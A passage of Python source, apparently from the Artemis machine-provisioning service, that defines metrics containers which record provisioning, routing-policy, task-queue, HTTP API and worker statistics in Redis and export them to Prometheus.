'Current total number of guest requests being provisioned.',
registry=registry
)
self.OVERALL_PROVISIONING_COUNT = Counter(
'overall_provisioning_count',
'Overall total number of all requested guest requests.',
registry=registry
)
self.OVERALL_SUCCESSFULL_PROVISIONING_COUNT = Counter(
'overall_successfull_provisioning_count',
'Overall total number of all successfully provisioned guest requests by pool.',
['pool'],
registry=registry
)
self.OVERALL_FAILOVER_COUNT = Counter(
'overall_failover_count',
'Overall total number of failovers to another pool by source and destination pool.',
['from_pool', 'to_pool'],
registry=registry
)
self.OVERALL_SUCCESSFULL_FAILOVER_COUNT = Counter(
'overall_successfull_failover_count',
'Overall total number of successful failovers to another pool by source and destination pool.',
['from_pool', 'to_pool'],
registry=registry
)
self.GUEST_AGES = Gauge(
'guest_request_age',
'Guest request ages by pool and state.',
['pool', 'state', 'age_threshold'],
registry=registry
)
self.PROVISION_DURATIONS = Histogram(
'provisioning_duration_seconds',
'The time spent provisioning a machine.',
[],
buckets=PROVISION_DURATION_BUCKETS,
registry=registry,
)
def update_prometheus(self) -> None:
"""
Update values of Prometheus metric instances with the data in this container.
"""
super(ProvisioningMetrics, self).update_prometheus()
self.CURRENT_GUEST_REQUEST_COUNT_TOTAL.set(self.current)
self.OVERALL_PROVISIONING_COUNT._value.set(self.requested)
for pool, count in self.success.items():
self.OVERALL_SUCCESSFULL_PROVISIONING_COUNT.labels(pool=pool)._value.set(count)
for (from_pool, to_pool), count in self.failover.items():
self.OVERALL_FAILOVER_COUNT.labels(from_pool=from_pool, to_pool=to_pool)._value.set(count)
for (from_pool, to_pool), count in self.failover_success.items():
self.OVERALL_SUCCESSFULL_FAILOVER_COUNT.labels(from_pool=from_pool, to_pool=to_pool)._value.set(count)
reset_counters(self.GUEST_AGES)
for state, poolname, age in self.guest_ages:
# Pick the smallest larger bucket threshold (e.g. age == 250 => 300, age == 3599 => 3600, ...)
# There's always the last threshold, infinity, so the list should never be empty.
age_threshold = min([threshold for threshold in GUEST_AGE_BUCKETS if threshold > age.total_seconds()])
self.GUEST_AGES.labels(state=state, pool=poolname, age_threshold=age_threshold).inc()
# Set each bucket to number of observations, and each sum to (observations * bucket threshold)
# since we don't track the exact duration, just what bucket it falls into.
reset_histogram(self.PROVISION_DURATIONS)
for bucket_threshold, count in self.provisioning_durations.items():
bucket_index = PROVISION_DURATION_BUCKETS.index(
prometheus_client.utils.INF if bucket_threshold == 'inf' else int(bucket_threshold)
)
self.PROVISION_DURATIONS._buckets[bucket_index].set(count)
self.PROVISION_DURATIONS._sum.inc(float(bucket_threshold) * count)
@dataclasses.dataclass
class RoutingMetrics(MetricsBase):
"""
Routing metrics.
"""
_KEY_CALLS = 'metrics.routing.policy.calls'
_KEY_CANCELLATIONS = 'metrics.routing.policy.cancellations'
_KEY_RULINGS = 'metrics.routing.policy.rulings'
policy_calls: Dict[str, int] = dataclasses.field(default_factory=dict)
policy_cancellations: Dict[str, int] = dataclasses.field(default_factory=dict)
policy_rulings: Dict[Tuple[str, str, str], int] = dataclasses.field(default_factory=dict)
@staticmethod
@with_context
def inc_policy_called(
policy_name: str,
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> Result[None, Failure]:
"""
Increase "policy called to make ruling" metric by 1.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:param policy_name: policy that was called to make ruling.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
inc_metric_field(logger, cache, RoutingMetrics._KEY_CALLS, policy_name)
return Ok(None)
@staticmethod
@with_context
def inc_policy_canceled(
policy_name: str,
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> Result[None, Failure]:
"""
Increase "policy canceled a guest request" metric by 1.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:param policy_name: policy that made the decision.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
inc_metric_field(logger, cache, RoutingMetrics._KEY_CANCELLATIONS, policy_name)
return Ok(None)
@staticmethod
@with_context
def inc_pool_allowed(
policy_name: str,
pool_name: str,
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> Result[None, Failure]:
"""
Increase "pool allowed by policy" metric by 1.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:param policy_name: policy that made the decision.
:param pool_name: pool that was allowed.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
inc_metric_field(logger, cache, RoutingMetrics._KEY_RULINGS, '{}:{}:yes'.format(policy_name, pool_name))
return Ok(None)
@staticmethod
@with_context
def inc_pool_excluded(
policy_name: str,
pool_name: str,
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> Result[None, Failure]:
"""
Increase "pool excluded by policy" metric by 1.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:param policy_name: policy that made the decision.
:param pool_name: pool that was excluded.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
inc_metric_field(logger, cache, RoutingMetrics._KEY_RULINGS, '{}:{}:no'.format(policy_name, pool_name))
return Ok(None)
@with_context
def sync(
self,
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> None:
"""
Load values from the storage and update this container with up-to-date values.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
"""
super(RoutingMetrics, self).sync()
self.policy_calls = {
field: count
for field, count in get_metric_fields(logger, cache, self._KEY_CALLS).items()
}
self.policy_cancellations = {
field: count
for field, count in get_metric_fields(logger, cache, self._KEY_CANCELLATIONS).items()
}
# fields are in form `policy:pool:allowed`
self.policy_rulings = {
cast(Tuple[str, str, str], tuple(field.split(':', 2))): count
for field, count in get_metric_fields(logger, cache, self._KEY_RULINGS).items()
}
def register_with_prometheus(self, registry: CollectorRegistry) -> None:
"""
Register instances of Prometheus metrics with the given registry.
:param registry: Prometheus registry to attach metrics to.
"""
super(RoutingMetrics, self).register_with_prometheus(registry)
self.OVERALL_POLICY_CALLS_COUNT = Counter(
'overall_policy_calls_count',
'Overall total number of policy calls by policy name.',
['policy'],
registry=registry
)
self.OVERALL_POLICY_CANCELLATIONS_COUNT = Counter(
'overall_policy_cancellations_count',
'Overall total number of policy cancellations of guest requests, by policy name.',
['policy'],
registry=registry
)
self.OVERALL_POLICY_RULINGS_COUNT = Counter(
'overall_policy_rulings_count',
'Overall total number of policy rulings by policy name, pool name and whether the pool was allowed.',
['policy', 'pool', 'allowed'],
registry=registry
)
def update_prometheus(self) -> None:
"""
Update values of Prometheus metric instances with the data in this container.
"""
super(RoutingMetrics, self).update_prometheus()
for policy_name, count in self.policy_calls.items():
self.OVERALL_POLICY_CALLS_COUNT.labels(policy=policy_name)._value.set(count)
for policy_name, count in self.policy_cancellations.items():
self.OVERALL_POLICY_CANCELLATIONS_COUNT.labels(policy=policy_name)._value.set(count)
for (policy_name, pool_name, allowed), count in self.policy_rulings.items():
self.OVERALL_POLICY_RULINGS_COUNT \
.labels(policy=policy_name, pool=pool_name, allowed=allowed) \
._value.set(count)
@dataclasses.dataclass
class TaskMetrics(MetricsBase):
"""
Task and actor metrics.
"""
overall_message_count: Dict[Tuple[str, str], int] = dataclasses.field(default_factory=dict)
overall_errored_message_count: Dict[Tuple[str, str], int] = dataclasses.field(default_factory=dict)
overall_retried_message_count: Dict[Tuple[str, str], int] = dataclasses.field(default_factory=dict)
overall_rejected_message_count: Dict[Tuple[str, str], int] = dataclasses.field(default_factory=dict)
current_message_count: Dict[Tuple[str, str], int] = dataclasses.field(default_factory=dict)
current_delayed_message_count: Dict[Tuple[str, str], int] = dataclasses.field(default_factory=dict)
message_durations: Dict[Tuple[str, str, str, str], int] = dataclasses.field(default_factory=dict)
_KEY_OVERALL_MESSAGES = 'metrics.tasks.messages.overall'
_KEY_OVERALL_ERRORED_MESSAGES = 'metrics.tasks.messages.overall.errored'
_KEY_OVERALL_RETRIED_MESSAGES = 'metrics.tasks.messages.overall.retried'
_KEY_OVERALL_REJECTED_MESSAGES = 'metrics.tasks.messages.overall.rejected'
_KEY_CURRENT_MESSAGES = 'metrics.tasks.messages.current'
_KEY_CURRENT_DELAYED_MESSAGES = 'metrics.tasks.messages.current.delayed'
_KEY_MESSAGE_DURATIONS = 'metrics.tasks.messages.durations'
@staticmethod
@with_context
def inc_overall_messages(
queue: str,
actor: str,
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> Result[None, Failure]:
"""
Increment number of all encountered messages.
:param queue: name of the queue the message belongs to.
:param actor: name of the actor requested by the message.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
inc_metric_field(logger, cache, TaskMetrics._KEY_OVERALL_MESSAGES, '{}:{}'.format(queue, actor))
return Ok(None)
@staticmethod
@with_context
def inc_overall_errored_messages(
queue: str,
actor: str,
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> Result[None, Failure]:
"""
Increment number of all errored messages.
:param queue: name of the queue the message belongs to.
:param actor: name of the actor requested by the message.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
inc_metric_field(logger, cache, TaskMetrics._KEY_OVERALL_ERRORED_MESSAGES, '{}:{}'.format(queue, actor))
return Ok(None)
@staticmethod
@with_context
def inc_overall_retried_messages(
queue: str,
actor: str,
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> Result[None, Failure]:
"""
Increment number of all retried messages.
:param queue: name of the queue the message belongs to.
:param actor: name of the actor requested by the message.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
inc_metric_field(logger, cache, TaskMetrics._KEY_OVERALL_RETRIED_MESSAGES, '{}:{}'.format(queue, actor))
return Ok(None)
@staticmethod
@with_context
def inc_overall_rejected_messages(
queue: str,
actor: str,
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> Result[None, Failure]:
"""
Increment number of all rejected messages.
:param queue: name of the queue the message belongs to.
:param actor: name of the actor requested by the message.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
inc_metric_field(logger, cache, TaskMetrics._KEY_OVERALL_REJECTED_MESSAGES, '{}:{}'.format(queue, actor))
return Ok(None)
@staticmethod
@with_context
def inc_current_messages(
queue: str,
actor: str,
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> Result[None, Failure]:
"""
Increment number of messages currently being processed.
:param queue: name of the queue the message belongs to.
:param actor: name of the actor requested by the message.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
inc_metric_field(logger, cache, TaskMetrics._KEY_CURRENT_MESSAGES, '{}:{}'.format(queue, actor))
return Ok(None)
@staticmethod
@with_context
def dec_current_messages(
queue: str,
actor: str,
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> Result[None, Failure]:
"""
Decrement number of all messages currently being processed.
:param queue: name of the queue the message belongs to.
:param actor: name of the actor requested by the message.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
dec_metric_field(logger, cache, TaskMetrics._KEY_CURRENT_MESSAGES, '{}:{}'.format(queue, actor))
return Ok(None)
@staticmethod
@with_context
def inc_current_delayed_messages(
queue: str,
actor: str,
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> Result[None, Failure]:
"""
Increment number of delayed messages.
:param queue: name of the queue the message belongs to.
:param actor: name of the actor requested by the message.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
inc_metric_field(logger, cache, TaskMetrics._KEY_CURRENT_DELAYED_MESSAGES, '{}:{}'.format(queue, actor))
return Ok(None)
@staticmethod
@with_context
def dec_current_delayed_messages(
queue: str,
actor: str,
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> Result[None, Failure]:
"""
Decrement number of delayed messages.
:param queue: name of the queue the message belongs to.
:param actor: name of the actor requested by the message.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
dec_metric_field(logger, cache, TaskMetrics._KEY_CURRENT_DELAYED_MESSAGES, '{}:{}'.format(queue, actor))
return Ok(None)
@staticmethod
@with_context
def inc_message_durations(
queue: str,
actor: str,
duration: int,
poolname: Optional[str],
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> Result[None, Failure]:
"""
Increment number of messages in a duration bucket by one.
The bucket is determined by the upper bound of the given ``duration``.
:param queue: name of the queue the message belongs to.
:param actor: name of the actor requested by the message.
:param duration: how long, in milliseconds, it took the actor to finish the task.
:param poolname: if specified, task was working with a particular pool.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
bucket = min([threshold for threshold in MESSAGE_DURATION_BUCKETS if threshold > duration])
inc_metric_field(
logger,
cache,
TaskMetrics._KEY_MESSAGE_DURATIONS,
'{}:{}:{}:{}'.format(queue, actor, bucket, poolname or 'undefined')
)
return Ok(None)
@with_context
def sync(
self,
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> None:
"""
Load values from the storage and update this container with up-to-date values.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
"""
super(TaskMetrics, self).sync()
# queue:actor => count
self.overall_message_count = {
cast(Tuple[str, str], tuple(field.split(':', 1))): count
for field, count in get_metric_fields(logger, cache, self._KEY_OVERALL_MESSAGES).items()
}
self.overall_errored_message_count = {
cast(Tuple[str, str], tuple(field.split(':', 1))): count
for field, count in get_metric_fields(logger, cache, self._KEY_OVERALL_ERRORED_MESSAGES).items()
}
self.overall_retried_message_count = {
cast(Tuple[str, str], tuple(field.split(':', 1))): count
for field, count in get_metric_fields(logger, cache, self._KEY_OVERALL_RETRIED_MESSAGES).items()
}
self.overall_rejected_message_count = {
cast(Tuple[str, str], tuple(field.split(':', 1))): count
for field, count in get_metric_fields(logger, cache, self._KEY_OVERALL_REJECTED_MESSAGES).items()
}
self.current_message_count = {
cast(Tuple[str, str], tuple(field.split(':', 1))): count
for field, count in get_metric_fields(logger, cache, self._KEY_CURRENT_MESSAGES).items()
}
self.current_delayed_message_count = {
cast(Tuple[str, str], tuple(field.split(':', 1))): count
for field, count in get_metric_fields(logger, cache, self._KEY_CURRENT_DELAYED_MESSAGES).items()
}
# queue:actor:bucket:poolname => count
# deal with older version which had only three dimensions (no poolname)
self.message_durations = {}
for field, count in get_metric_fields(logger, cache, self._KEY_MESSAGE_DURATIONS).items():
field_split = tuple(field.split(':', 3))
if len(field_split) == 3:
field_split = field_split + ('undefined',)
self.message_durations[cast(Tuple[str, str, str, str], field_split)] = count
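# For example (illustrative values): a legacy field 'default:route-guest:60'
# becomes ('default', 'route-guest', '60', 'undefined'), while a new-style
# field 'default:route-guest:60:aws' is kept as-is.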
def register_with_prometheus(self, registry: CollectorRegistry) -> None:
"""
Register instances of Prometheus metrics with the given registry.
:param registry: Prometheus registry to attach metrics to.
"""
super(TaskMetrics, self).register_with_prometheus(registry)
self.OVERALL_MESSAGE_COUNT = Counter(
'overall_message_count',
'Overall total number of messages processed by queue and actor.',
['queue_name', 'actor_name'],
registry=registry
)
self.OVERALL_ERRORED_MESSAGE_COUNT = Counter(
'overall_errored_message_count',
'Overall total number of errored messages by queue and actor.',
['queue_name', 'actor_name'],
registry=registry
)
self.OVERALL_RETRIED_MESSAGE_COUNT = Counter(
'overall_retried_message_count',
'Overall total number of retried messages by queue and actor.',
['queue_name', 'actor_name'],
registry=registry
)
self.OVERALL_REJECTED_MESSAGE_COUNT = Counter(
'overall_rejected_message_count',
'Overall total number of rejected messages by queue and actor.',
['queue_name', 'actor_name'],
registry=registry
)
self.CURRENT_MESSAGE_COUNT = Gauge(
'current_message_count',
'Current number of messages being processed by queue and actor.',
['queue_name', 'actor_name'],
registry=registry
)
self.CURRENT_DELAYED_MESSAGE_COUNT = Gauge(
'current_delayed_message_count',
'Current number of messages being delayed by queue and actor.',
['queue_name', 'actor_name'],
registry=registry
)
self.MESSAGE_DURATIONS = Histogram(
'message_duration_milliseconds',
'The time spent processing messages by queue and actor.',
['queue_name', 'actor_name', 'pool'],
buckets=MESSAGE_DURATION_BUCKETS,
registry=registry,
)
@with_context
def update_prometheus(self, logger: gluetool.log.ContextAdapter, cache: redis.Redis) -> None:
"""
Update values of Prometheus metric instances with the data in this container.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
"""
super(TaskMetrics, self).update_prometheus()
def _update_counter(prom_metric: Counter, source: Dict[Tuple[str, str], int]) -> None:
reset_counters(prom_metric)
for (queue_name, actor_name), count in source.items():
prom_metric.labels(queue_name=queue_name, actor_name=actor_name)._value.set(count)
_update_counter(self.OVERALL_MESSAGE_COUNT, self.overall_message_count)
_update_counter(self.OVERALL_ERRORED_MESSAGE_COUNT, self.overall_errored_message_count)
_update_counter(self.OVERALL_REJECTED_MESSAGE_COUNT, self.overall_rejected_message_count)
_update_counter(self.OVERALL_RETRIED_MESSAGE_COUNT, self.overall_retried_message_count)
_update_counter(self.CURRENT_MESSAGE_COUNT, self.current_message_count)
_update_counter(self.CURRENT_DELAYED_MESSAGE_COUNT, self.current_delayed_message_count)
# Reset all duration buckets and sums first
reset_histogram(self.MESSAGE_DURATIONS)
# Then, update each bucket with number of observations, and each sum with (observations * bucket threshold)
# since we don't track the exact duration, just what bucket it falls into.
for (queue_name, actor_name, bucket_threshold, poolname), count in self.message_durations.items():
bucket_index = MESSAGE_DURATION_BUCKETS.index(
prometheus_client.utils.INF if bucket_threshold == 'inf' else int(bucket_threshold)
)
self.MESSAGE_DURATIONS.labels(queue_name, actor_name, poolname)._buckets[bucket_index].set(count)
self.MESSAGE_DURATIONS.labels(queue_name, actor_name, poolname)._sum.inc(float(bucket_threshold) * count)
@dataclasses.dataclass
class APIMetrics(MetricsBase):
"""
API metrics (mostly HTTP traffic).
"""
request_durations: Dict[Tuple[str, str, str], int] = dataclasses.field(default_factory=dict)
request_count: Dict[Tuple[str, str, str], int] = dataclasses.field(default_factory=dict)
request_inprogress_count: Dict[Tuple[str, str], int] = dataclasses.field(default_factory=dict)
_KEY_REQUEST_DURATIONS = 'metrics.api.http.request.durations'
_KEY_REQUEST_COUNT = 'metrics.api.http.request.total'
_KEY_REQUEST_INPROGRESS_COUNT = 'metrics.api.http.request.in-progress'
@staticmethod
@with_context
def inc_request_durations(
method: str,
path: str,
duration: float,
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> Result[None, Failure]:
"""
Increment number of HTTP requests in a duration bucket by one.
The bucket is determined by the upper bound of the given ``duration``.
:param method: HTTP method.
:param path: API endpoint requested.
:param duration: how long, in milliseconds, the request took to complete.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
bucket = min([threshold for threshold in HTTP_REQUEST_DURATION_BUCKETS if threshold > duration])
inc_metric_field(
logger,
cache,
APIMetrics._KEY_REQUEST_DURATIONS,
'{}:{}:{}'.format(method, bucket, path)
)
return Ok(None)
@staticmethod
@with_context
def inc_requests(
method: str,
path: str,
status: str,
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> Result[None, Failure]:
"""
Increment number of completed requests.
:param method: HTTP method.
:param path: API endpoint requested.
:param status: final HTTP status.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
inc_metric_field(logger, cache, APIMetrics._KEY_REQUEST_COUNT, '{}:{}:{}'.format(method, status, path))
return Ok(None)
@staticmethod
@with_context
def inc_requests_in_progress(
method: str,
path: str,
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> Result[None, Failure]:
"""
Increment number of current requests.
:param method: HTTP method.
:param path: API endpoint requested.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
inc_metric_field(logger, cache, APIMetrics._KEY_REQUEST_INPROGRESS_COUNT, '{}:{}'.format(method, path))
return Ok(None)
@staticmethod
@with_context
def dec_requests_in_progress(
method: str,
path: str,
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> Result[None, Failure]:
"""
Decrement number of current requests.
:param method: HTTP method.
:param path: API endpoint requested.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
dec_metric_field(logger, cache, APIMetrics._KEY_REQUEST_INPROGRESS_COUNT, '{}:{}'.format(method, path))
return Ok(None)
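# A minimal sketch of how the in-progress counters are meant to be paired,
# assuming the context variables are set; `handle_request` is hypothetical:
#
#     APIMetrics.inc_requests_in_progress('GET', '/guests')
#     try:
#         response = handle_request()
#     finally:
#         APIMetrics.dec_requests_in_progress('GET', '/guests')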
def register_with_prometheus(self, registry: CollectorRegistry) -> None:
"""
Register instances of Prometheus metrics with the given registry.
:param registry: Prometheus registry to attach metrics to.
"""
super(APIMetrics, self).register_with_prometheus(registry)
self.REQUEST_DURATIONS = Histogram(
'http_request_duration_milliseconds',
'Time spent processing a request.',
['method', 'path'],
buckets=HTTP_REQUEST_DURATION_BUCKETS,
registry=registry
)
self.REQUEST_COUNT = Counter(
'http_requests_count',
'Request count by method, path and status line.',
['method', 'path', 'status'],
registry=registry
)
self.REQUESTS_INPROGRESS_COUNT = Gauge(
'http_requests_inprogress_count',
'Requests in progress by method and path.',
['method', 'path'],
registry=registry
)
@with_context
def sync(self, logger: gluetool.log.ContextAdapter, cache: redis.Redis) -> None:
"""
Load values from the storage and update this container with up-to-date values.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
"""
super(APIMetrics, self).sync()
# NOTE: some paths may contain `:` => `path` must be the last bit, and `split()` must be called
# with limited number of splits to prevent `path` exploding.
# method:bucket:path => count
self.request_durations = {
cast(Tuple[str, str, str], tuple(field.split(':', 2))): count
for field, count in get_metric_fields(logger, cache, self._KEY_REQUEST_DURATIONS).items()
}
# method:status:path => count
self.request_count = {
cast(Tuple[str, str, str], tuple(field.split(':', 2))): count
for field, count in get_metric_fields(logger, cache, self._KEY_REQUEST_COUNT).items()
}
# method:path => count
self.request_inprogress_count = {
cast(Tuple[str, str], tuple(field.split(':', 1))): count
for field, count in get_metric_fields(logger, cache, self._KEY_REQUEST_INPROGRESS_COUNT).items()
}
def update_prometheus(self) -> None:
"""
Update values of Prometheus metric instances with the data in this container.
"""
super(APIMetrics, self).update_prometheus()
# Reset all duration buckets and sums first
reset_histogram(self.REQUEST_DURATIONS)
# Then, update each bucket with number of observations, and each sum with (observations * bucket threshold)
# since we don't track the exact duration, just what bucket it falls into.
for (method, bucket_threshold, path), count in self.request_durations.items():
bucket_index = HTTP_REQUEST_DURATION_BUCKETS.index(
prometheus_client.utils.INF if bucket_threshold == 'inf' else int(bucket_threshold)
)
self.REQUEST_DURATIONS \
.labels(method=method, path=path) \
._buckets[bucket_index].set(count)
self.REQUEST_DURATIONS \
.labels(method=method, path=path) \
._sum.inc(float(bucket_threshold) * count)
reset_counters(self.REQUEST_COUNT)
for (method, status, path), count in self.request_count.items():
self.REQUEST_COUNT \
.labels(method=method, path=path, status=status) \
._value.set(count)
reset_counters(self.REQUESTS_INPROGRESS_COUNT)
for (method, path), count in self.request_inprogress_count.items():
self.REQUESTS_INPROGRESS_COUNT \
.labels(method=method, path=path) \
._value.set(count)
@dataclasses.dataclass
class WorkerMetrics(MetricsBase):
"""
Proxy for metrics related to workers.
"""
worker_process_count: Dict[str, Optional[int]] = dataclasses.field(default_factory=dict)
worker_thread_count: Dict[str, Optional[int]] = dataclasses.field(default_factory=dict)
worker_updated_timestamp: Dict[str, Optional[int]] = dataclasses.field(default_factory=dict)
_KEY_WORKER_PROCESS_COUNT = 'metrics.workers.{worker}.processes'
_KEY_WORKER_THREAD_COUNT = 'metrics.workers.{worker}.threads'
_KEY_UPDATED_TIMESTAMP = 'metrics.workers.{worker}.updated_timestamp'
@staticmethod
@with_context
def update_worker_counts(
*,
worker: str,
processes: int,
threads: int,
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> Result[None, Failure]:
"""
Update metrics for a given worker.
:param worker: name of the worker.
:param processes: number of worker processes.
:param threads: number of worker threads.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
set_metric(
logger,
cache,
WorkerMetrics._KEY_WORKER_PROCESS_COUNT.format(worker=worker),
processes,
ttl=KNOB_WORKER_PROCESS_METRICS_TTL.value
)
set_metric(
logger,
cache,
WorkerMetrics._KEY_WORKER_THREAD_COUNT.format(worker=worker),
threads,
ttl=KNOB_WORKER_PROCESS_METRICS_TTL.value
)
set_metric(
logger,
cache,
WorkerMetrics._KEY_UPDATED_TIMESTAMP.format(worker=worker),
int(time.time()),
ttl=KNOB_WORKER_PROCESS_METRICS_TTL.value
)
return Ok(None)
def register_with_prometheus(self, registry: CollectorRegistry) -> None:
"""
Register instances of Prometheus metrics with the given registry.
:param registry: Prometheus registry to attach metrics to.
"""
super(WorkerMetrics, self).register_with_prometheus(registry)
self.WORKER_PROCESS_COUNT = Gauge(
'worker_process_count',
'Number of processes by worker.',
['worker'],
registry=registry
)
self.WORKER_THREAD_COUNT = Gauge(
'worker_thread_count',
'Number of threads by worker.',
['worker'],
registry=registry
)
self.WORKER_UPDATED_TIMESTAMP = Gauge(
'worker_updated_timestamp',
'Last time the worker info has been updated.',
['worker'],
registry=registry
)
@with_context
def sync(self, logger: gluetool.log.ContextAdapter, cache: redis.Redis) -> None:
"""
Load values from the storage and update this container with up-to-date values.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
"""
super(WorkerMetrics, self).sync()
self.worker_process_count = {
metric.decode().split('.')[2]: get_metric(logger, cache, metric.decode())
for metric in iter_cache_keys(logger, cache, 'metrics.workers.*.processes')
}
self.worker_thread_count = {
metric.decode().split('.')[2]: get_metric(logger, cache, metric.decode())
for metric in iter_cache_keys(logger, cache, 'metrics.workers.*.threads')
}
self.worker_updated_timestamp = {
metric.decode().split('.')[2]: get_metric(logger, cache, metric.decode())
for metric in iter_cache_keys(logger, cache, 'metrics.workers.*.updated_timestamp')
}
def update_prometheus(self) -> None:
"""
Update values of Prometheus metric instances with the data in this container.
"""
super(WorkerMetrics, self).update_prometheus()
reset_counters(self.WORKER_PROCESS_COUNT)
reset_counters(self.WORKER_THREAD_COUNT)
reset_counters(self.WORKER_UPDATED_TIMESTAMP)
# TODO: move these into `reset_counters` - these should be more reliable, and we wouldn't have to
# do the work on our own.
self.WORKER_PROCESS_COUNT.clear()
self.WORKER_THREAD_COUNT.clear()
self.WORKER_UPDATED_TIMESTAMP.clear()
for worker, processes in self.worker_process_count.items():
self.WORKER_PROCESS_COUNT \
.labels(worker=worker) \
.set(processes)
for worker, threads in self.worker_thread_count.items():
self.WORKER_THREAD_COUNT \
.labels(worker=worker) \
.set(threads)
for worker, timestamp in self.worker_updated_timestamp.items():
self.WORKER_UPDATED_TIMESTAMP \
.labels(worker=worker) \
.set(float(timestamp) if timestamp is not None else float('NaN'))
@staticmethod
def spawn_metrics_refresher(
logger: gluetool.log.ContextAdapter,
worker_name: str,
interval: int,
metrics_getter: Callable[[Any], Result[Tuple[int, int], Failure]],
thread_name: str = 'worker-metrics-refresher',
worker_instance: Optional[Any] = None,
) -> threading.Thread:
"""
Create and start a thread to refresh cached worker metrics.
A thread is started, to call ``metrics_getter`` periodically. After each call, data provided by the callable
are stored in a cache.
The thread is marked as ``daemon``, therefore it is not necessary to stop it when the caller decides to quit.
:param logger: logger to use for logging.
:param worker_name: name of the worker.
:param worker_instance: instance of the worker. It is not inspected by the thread, and it's passed directly
to ``metrics_getter``.
:param interval: how often to refresh worker metrics.
:param metrics_getter: a callable with one parameter, ``worker_instance``. It is called every iteration
and should return a pair of two values: the number of worker processes and threads.
:param thread_name: name of the refresher thread.
:returns: running and daemonized thread.
"""
def _refresh_loop() -> None:
while True:
r_metrics = metrics_getter(worker_instance)
if r_metrics.is_error:
r_metrics.unwrap_error().handle(logger)
else:
processes, threads = r_metrics.unwrap()
WorkerMetrics.update_worker_counts(
worker=worker_name,
processes=processes,
threads=threads
)
time.sleep(interval)
thread = threading.Thread(target=_refresh_loop, name=thread_name, daemon=True)
thread.start()
return thread
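# A minimal usage sketch; the getter below is hypothetical and stands in for
# a real worker introspection call:
#
#     def _get_counts(_worker: Any) -> Result[Tuple[int, int], Failure]:
#         return Ok((4, 32))  # e.g. 4 processes, 32 threads
#
#     WorkerMetrics.spawn_metrics_refresher(logger, 'worker-1', 60, _get_counts)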
@dataclasses.dataclass
class Metrics(MetricsBase):
"""
Global metrics that don't fit anywhere else, and also a root of the tree of metrics.
"""
db: DBMetrics = DBMetrics()
pools: PoolsMetrics = PoolsMetrics()
provisioning: ProvisioningMetrics = ProvisioningMetrics()
routing: RoutingMetrics = RoutingMetrics()
tasks: TaskMetrics = TaskMetrics()
api: APIMetrics = APIMetrics()
workers: WorkerMetrics = WorkerMetrics()
# Registry this tree of metrics containers is tied to.
_registry: Optional[CollectorRegistry] = None
def register_with_prometheus(self, registry: CollectorRegistry) -> None:
"""
Register instances of Prometheus metrics with the given registry.
:param registry: Prometheus registry to attach metrics to.
"""
super(Metrics, self).register_with_prometheus(registry)
self._registry = registry
self.PACKAGE_INFO = Info(
'artemis_package',
'Artemis packaging info. Labels provide information about package versions.',
registry=registry
)
self.IDENTITY_INFO = Info(
'artemis_identity',
'Artemis identity info. Labels provide information about identity aspects.',
registry=registry
)
# Since these values won't ever change, we can already set metrics and be done with it.
self.PACKAGE_INFO.info({
